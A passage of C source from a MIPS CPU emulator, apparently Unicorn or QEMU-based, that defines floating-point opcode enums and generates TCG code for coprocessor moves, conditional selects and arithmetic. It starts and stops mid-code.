OPC_CVT_W_S = FOP(36, FMT_S), OPC_CVT_L_S = FOP(37, FMT_S), OPC_CVT_PS_S = FOP(38, FMT_S), OPC_CMP_F_S = FOP(48, FMT_S), OPC_CMP_UN_S = FOP(49, FMT_S), OPC_CMP_EQ_S = FOP(50, FMT_S), OPC_CMP_UEQ_S = FOP(51, FMT_S), OPC_CMP_OLT_S = FOP(52, FMT_S), OPC_CMP_ULT_S = FOP(53, FMT_S), OPC_CMP_OLE_S = FOP(54, FMT_S), OPC_CMP_ULE_S = FOP(55, FMT_S), OPC_CMP_SF_S = FOP(56, FMT_S), OPC_CMP_NGLE_S = FOP(57, FMT_S), OPC_CMP_SEQ_S = FOP(58, FMT_S), OPC_CMP_NGL_S = FOP(59, FMT_S), OPC_CMP_LT_S = FOP(60, FMT_S), OPC_CMP_NGE_S = FOP(61, FMT_S), OPC_CMP_LE_S = FOP(62, FMT_S), OPC_CMP_NGT_S = FOP(63, FMT_S), OPC_ADD_D = FOP(0, FMT_D), OPC_SUB_D = FOP(1, FMT_D), OPC_MUL_D = FOP(2, FMT_D), OPC_DIV_D = FOP(3, FMT_D), OPC_SQRT_D = FOP(4, FMT_D), OPC_ABS_D = FOP(5, FMT_D), OPC_MOV_D = FOP(6, FMT_D), OPC_NEG_D = FOP(7, FMT_D), OPC_ROUND_L_D = FOP(8, FMT_D), OPC_TRUNC_L_D = FOP(9, FMT_D), OPC_CEIL_L_D = FOP(10, FMT_D), OPC_FLOOR_L_D = FOP(11, FMT_D), OPC_ROUND_W_D = FOP(12, FMT_D), OPC_TRUNC_W_D = FOP(13, FMT_D), OPC_CEIL_W_D = FOP(14, FMT_D), OPC_FLOOR_W_D = FOP(15, FMT_D), OPC_SEL_D = FOP(16, FMT_D), OPC_MOVCF_D = FOP(17, FMT_D), OPC_MOVZ_D = FOP(18, FMT_D), OPC_MOVN_D = FOP(19, FMT_D), OPC_SELEQZ_D = FOP(20, FMT_D), OPC_RECIP_D = FOP(21, FMT_D), OPC_RSQRT_D = FOP(22, FMT_D), OPC_SELNEZ_D = FOP(23, FMT_D), OPC_MADDF_D = FOP(24, FMT_D), OPC_MSUBF_D = FOP(25, FMT_D), OPC_RINT_D = FOP(26, FMT_D), OPC_CLASS_D = FOP(27, FMT_D), OPC_MIN_D = FOP(28, FMT_D), OPC_RECIP2_D = FOP(28, FMT_D), OPC_MINA_D = FOP(29, FMT_D), OPC_RECIP1_D = FOP(29, FMT_D), OPC_MAX_D = FOP(30, FMT_D), OPC_RSQRT1_D = FOP(30, FMT_D), OPC_MAXA_D = FOP(31, FMT_D), OPC_RSQRT2_D = FOP(31, FMT_D), OPC_CVT_S_D = FOP(32, FMT_D), OPC_CVT_W_D = FOP(36, FMT_D), OPC_CVT_L_D = FOP(37, FMT_D), OPC_CMP_F_D = FOP(48, FMT_D), OPC_CMP_UN_D = FOP(49, FMT_D), OPC_CMP_EQ_D = FOP(50, FMT_D), OPC_CMP_UEQ_D = FOP(51, FMT_D), OPC_CMP_OLT_D = FOP(52, FMT_D), OPC_CMP_ULT_D = FOP(53, FMT_D), OPC_CMP_OLE_D = FOP(54, FMT_D), OPC_CMP_ULE_D = FOP(55, FMT_D), OPC_CMP_SF_D = FOP(56, FMT_D), OPC_CMP_NGLE_D = FOP(57, FMT_D), OPC_CMP_SEQ_D = FOP(58, FMT_D), OPC_CMP_NGL_D = FOP(59, FMT_D), OPC_CMP_LT_D = FOP(60, FMT_D), OPC_CMP_NGE_D = FOP(61, FMT_D), OPC_CMP_LE_D = FOP(62, FMT_D), OPC_CMP_NGT_D = FOP(63, FMT_D), OPC_CVT_S_W = FOP(32, FMT_W), OPC_CVT_D_W = FOP(33, FMT_W), OPC_CVT_S_L = FOP(32, FMT_L), OPC_CVT_D_L = FOP(33, FMT_L), OPC_CVT_PS_PW = FOP(38, FMT_W), OPC_ADD_PS = FOP(0, FMT_PS), OPC_SUB_PS = FOP(1, FMT_PS), OPC_MUL_PS = FOP(2, FMT_PS), OPC_DIV_PS = FOP(3, FMT_PS), OPC_ABS_PS = FOP(5, FMT_PS), OPC_MOV_PS = FOP(6, FMT_PS), OPC_NEG_PS = FOP(7, FMT_PS), OPC_MOVCF_PS = FOP(17, FMT_PS), OPC_MOVZ_PS = FOP(18, FMT_PS), OPC_MOVN_PS = FOP(19, FMT_PS), OPC_ADDR_PS = FOP(24, FMT_PS), OPC_MULR_PS = FOP(26, FMT_PS), OPC_RECIP2_PS = FOP(28, FMT_PS), OPC_RECIP1_PS = FOP(29, FMT_PS), OPC_RSQRT1_PS = FOP(30, FMT_PS), OPC_RSQRT2_PS = FOP(31, FMT_PS), OPC_CVT_S_PU = FOP(32, FMT_PS), OPC_CVT_PW_PS = FOP(36, FMT_PS), OPC_CVT_S_PL = FOP(40, FMT_PS), OPC_PLL_PS = FOP(44, FMT_PS), OPC_PLU_PS = FOP(45, FMT_PS), OPC_PUL_PS = FOP(46, FMT_PS), OPC_PUU_PS = FOP(47, FMT_PS), OPC_CMP_F_PS = FOP(48, FMT_PS), OPC_CMP_UN_PS = FOP(49, FMT_PS), OPC_CMP_EQ_PS = FOP(50, FMT_PS), OPC_CMP_UEQ_PS = FOP(51, FMT_PS), OPC_CMP_OLT_PS = FOP(52, FMT_PS), OPC_CMP_ULT_PS = FOP(53, FMT_PS), OPC_CMP_OLE_PS = FOP(54, FMT_PS), OPC_CMP_ULE_PS = FOP(55, FMT_PS), OPC_CMP_SF_PS = FOP(56, FMT_PS), OPC_CMP_NGLE_PS = FOP(57, FMT_PS), OPC_CMP_SEQ_PS = FOP(58, FMT_PS), OPC_CMP_NGL_PS = FOP(59, FMT_PS), OPC_CMP_LT_PS = FOP(60, FMT_PS), OPC_CMP_NGE_PS = FOP(61, FMT_PS), OPC_CMP_LE_PS = FOP(62, FMT_PS), OPC_CMP_NGT_PS = FOP(63, FMT_PS), }; enum r6_f_cmp_op { R6_OPC_CMP_AF_S = FOP(0, FMT_W), R6_OPC_CMP_UN_S = FOP(1, FMT_W), R6_OPC_CMP_EQ_S = FOP(2, FMT_W), R6_OPC_CMP_UEQ_S = FOP(3, FMT_W), R6_OPC_CMP_LT_S = FOP(4, FMT_W), R6_OPC_CMP_ULT_S = FOP(5, FMT_W), R6_OPC_CMP_LE_S = FOP(6, FMT_W), R6_OPC_CMP_ULE_S = FOP(7, FMT_W), R6_OPC_CMP_SAF_S = FOP(8, FMT_W), R6_OPC_CMP_SUN_S = FOP(9, FMT_W), R6_OPC_CMP_SEQ_S = FOP(10, FMT_W), R6_OPC_CMP_SEUQ_S = FOP(11, FMT_W), R6_OPC_CMP_SLT_S = FOP(12, FMT_W), R6_OPC_CMP_SULT_S = FOP(13, FMT_W), R6_OPC_CMP_SLE_S = FOP(14, FMT_W), R6_OPC_CMP_SULE_S = FOP(15, FMT_W), R6_OPC_CMP_OR_S = FOP(17, FMT_W), R6_OPC_CMP_UNE_S = FOP(18, FMT_W), R6_OPC_CMP_NE_S = FOP(19, FMT_W), R6_OPC_CMP_SOR_S = FOP(25, FMT_W), R6_OPC_CMP_SUNE_S = FOP(26, FMT_W), R6_OPC_CMP_SNE_S = FOP(27, FMT_W), R6_OPC_CMP_AF_D = FOP(0, FMT_L), R6_OPC_CMP_UN_D = FOP(1, FMT_L), R6_OPC_CMP_EQ_D = FOP(2, FMT_L), R6_OPC_CMP_UEQ_D = FOP(3, FMT_L), R6_OPC_CMP_LT_D = FOP(4, FMT_L), R6_OPC_CMP_ULT_D = FOP(5, FMT_L), R6_OPC_CMP_LE_D = FOP(6, FMT_L), R6_OPC_CMP_ULE_D = FOP(7, FMT_L), R6_OPC_CMP_SAF_D = FOP(8, FMT_L), R6_OPC_CMP_SUN_D = FOP(9, FMT_L), R6_OPC_CMP_SEQ_D = FOP(10, FMT_L), R6_OPC_CMP_SEUQ_D = FOP(11, FMT_L), R6_OPC_CMP_SLT_D = FOP(12, FMT_L), R6_OPC_CMP_SULT_D = FOP(13, FMT_L), R6_OPC_CMP_SLE_D = FOP(14, FMT_L), R6_OPC_CMP_SULE_D = FOP(15, FMT_L), R6_OPC_CMP_OR_D = FOP(17, FMT_L), R6_OPC_CMP_UNE_D = FOP(18, FMT_L), R6_OPC_CMP_NE_D = FOP(19, FMT_L), R6_OPC_CMP_SOR_D = FOP(25, FMT_L), R6_OPC_CMP_SUNE_D = FOP(26, FMT_L), R6_OPC_CMP_SNE_D = FOP(27, FMT_L), }; static void gen_cp1(DisasContext *ctx, uint32_t opc, int rt, int fs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); switch (opc) { case OPC_MFC1: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); tcg_temp_free_i32(tcg_ctx, fp0); } gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_MTC1: gen_load_gpr(tcg_ctx, t0, rt); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32(ctx, fp0, fs); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CFC1: gen_helper_1e0i(cfc1, t0, fs); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_CTC1: gen_load_gpr(tcg_ctx, t0, rt); save_cpu_state(ctx, 0); { TCGv_i32 fs_tmp = tcg_const_i32(tcg_ctx, fs); gen_helper_0e2i(ctc1, t0, fs_tmp, rt); tcg_temp_free_i32(tcg_ctx, fs_tmp); } /* Stop translation as we may have changed hflags */ ctx->base.is_jmp = DISAS_STOP; break; #if defined(TARGET_MIPS64) case OPC_DMFC1: gen_load_fpr64(ctx, t0, fs); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_DMTC1: gen_load_gpr(tcg_ctx, t0, rt); gen_store_fpr64(ctx, t0, fs); break; #endif case OPC_MFHC1: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, fs); tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); tcg_temp_free_i32(tcg_ctx, fp0); } gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_MTHC1: gen_load_gpr(tcg_ctx, t0, rt); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32h(ctx, fp0, fs); tcg_temp_free_i32(tcg_ctx, fp0); } break; default: MIPS_INVAL("cp1 move"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); } static void gen_movci(DisasContext *ctx, int rd, int rs, int cc, int tf) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1; TCGCond cond; TCGv_i32 t0; if (rd == 0) { /* Treat as NOP. */ return; } if (tf) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } l1 = gen_new_label(tcg_ctx); t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); tcg_temp_free_i32(tcg_ctx, t0); if (rs == 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } gen_set_label(tcg_ctx, l1); } static inline void gen_movcf_s(DisasContext *ctx, int fs, int fd, int cc, int tf) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int cond; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); if (tf) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); gen_load_fpr32(ctx, t0, fs); gen_store_fpr32(ctx, t0, fd); gen_set_label(tcg_ctx, l1); tcg_temp_free_i32(tcg_ctx, t0); } static inline void gen_movcf_d(DisasContext *ctx, int fs, int fd, int cc, int tf) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int cond; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp0; TCGLabel *l1 = gen_new_label(tcg_ctx); if (tf) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); tcg_temp_free_i32(tcg_ctx, t0); fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } static inline void gen_movcf_ps(DisasContext *ctx, int fs, int fd, int cc, int tf) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int cond; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); if (tf) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); gen_load_fpr32(ctx, t0, fs); gen_store_fpr32(ctx, t0, fd); gen_set_label(tcg_ctx, l1); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc + 1)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l2); gen_load_fpr32h(ctx, t0, fs); gen_store_fpr32h(ctx, t0, fd); tcg_temp_free_i32(tcg_ctx, t0); gen_set_label(tcg_ctx, l2); } static void gen_sel_s(DisasContext *ctx, enum fopcode op1, int fd, int ft, int fs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0); TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fd); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fs); switch (op1) { case OPC_SEL_S: tcg_gen_andi_i32(tcg_ctx, fp0, fp0, 1); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, fp0, fp0, t1, fp1, fp2); break; case OPC_SELEQZ_S: tcg_gen_andi_i32(tcg_ctx, fp1, fp1, 1); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, fp0, fp1, t1, fp2, t1); break; case OPC_SELNEZ_S: tcg_gen_andi_i32(tcg_ctx, fp1, fp1, 1); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, fp0, fp1, t1, fp2, t1); break; default: MIPS_INVAL("gen_sel_s"); generate_exception_end(ctx, EXCP_RI); break; } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, t1); } static void gen_sel_d(DisasContext *ctx, enum fopcode op1, int fd, int ft, int fs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_const_i64(tcg_ctx, 0); TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fd); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fs); switch (op1) { case OPC_SEL_D: tcg_gen_andi_i64(tcg_ctx, fp0, fp0, 1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, fp0, fp0, t1, fp1, fp2); break; case OPC_SELEQZ_D: tcg_gen_andi_i64(tcg_ctx, fp1, fp1, 1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, fp0, fp1, t1, fp2, t1); break; case OPC_SELNEZ_D: tcg_gen_andi_i64(tcg_ctx, fp1, fp1, 1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, fp0, fp1, t1, fp2, t1); break; default: MIPS_INVAL("gen_sel_d"); generate_exception_end(ctx, EXCP_RI); break; } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp2); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_farith(DisasContext *ctx, enum fopcode op1, int ft, int fs, int fd, int cc) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t func = ctx->opcode & 0x3f; switch (op1) { case OPC_ADD_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_add_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SUB_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_sub_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MUL_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_mul_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_DIV_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_div_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SQRT_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_sqrt_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_ABS_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->abs2008) { tcg_gen_andi_i32(tcg_ctx, fp0, fp0, 0x7fffffffUL); } else { gen_helper_float_abs_s(tcg_ctx, fp0, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MOV_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_NEG_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->abs2008) { tcg_gen_xori_i32(tcg_ctx, fp0, fp0, 1UL << 31); } else { gen_helper_float_chs_s(tcg_ctx, fp0, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_ROUND_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_round_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_round_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_TRUNC_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_trunc_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_trunc_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CEIL_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_ceil_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_ceil_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_FLOOR_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_floor_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_floor_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_ROUND_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_round_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_round_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_TRUNC_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_trunc_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_trunc_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CEIL_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_ceil_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_ceil_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_FLOOR_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_floor_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_floor_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SEL_S: check_insn(ctx, ISA_MIPS32R6); gen_sel_s(ctx, op1, fd, ft, fs); break; case OPC_SELEQZ_S: check_insn(ctx, ISA_MIPS32R6); gen_sel_s(ctx, op1, fd, ft, fs); break; case OPC_SELNEZ_S: check_insn(ctx, ISA_MIPS32R6); gen_sel_s(ctx, op1, fd, ft, fs); break; case OPC_MOVCF_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_movcf_s(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); break; case OPC_MOVZ_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i32 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[ft], 0, l1); } fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } break; case OPC_MOVN_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i32 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[ft], 0, l1); fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } } break; case OPC_RECIP_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_recip_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_RSQRT_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_rsqrt_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MADDF_S: check_insn(ctx, ISA_MIPS32R6); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fd); gen_helper_float_maddf_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MSUBF_S: check_insn(ctx, ISA_MIPS32R6); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fd); gen_helper_float_msubf_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_RINT_S: check_insn(ctx, ISA_MIPS32R6); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_rint_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CLASS_S: check_insn(ctx, ISA_MIPS32R6); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_class_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MIN_S: /* OPC_RECIP2_S */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MIN_S */ TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_min_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } else { /* OPC_RECIP2_S */ check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); 